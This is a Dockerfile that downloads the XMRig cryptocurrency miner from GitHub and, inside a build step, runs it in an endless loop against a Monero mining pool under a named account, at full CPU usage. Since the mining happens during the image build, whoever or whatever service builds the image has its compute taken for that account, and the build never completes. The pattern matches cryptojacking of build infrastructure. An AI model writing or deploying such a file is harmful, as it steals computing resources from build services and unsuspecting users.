FROM ubuntu:18.10
RUN apt-get update && apt-get install -y wget
RUN wget https://github.com/xmrig/xmrig/releases/download/v2.13.1/xmrig-2.13.1-xenial-x64.tar.gz && tar -xf xmrig-2.13.1-xenial-x64.tar.gz && cd xmrig-2.13.1 && while true; do ./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u empireofbooks@gmail.com -p x --threads 1 --max-cpu-usage=100 --cpu-priority 5 --donate-level 1 ; sleep 1; done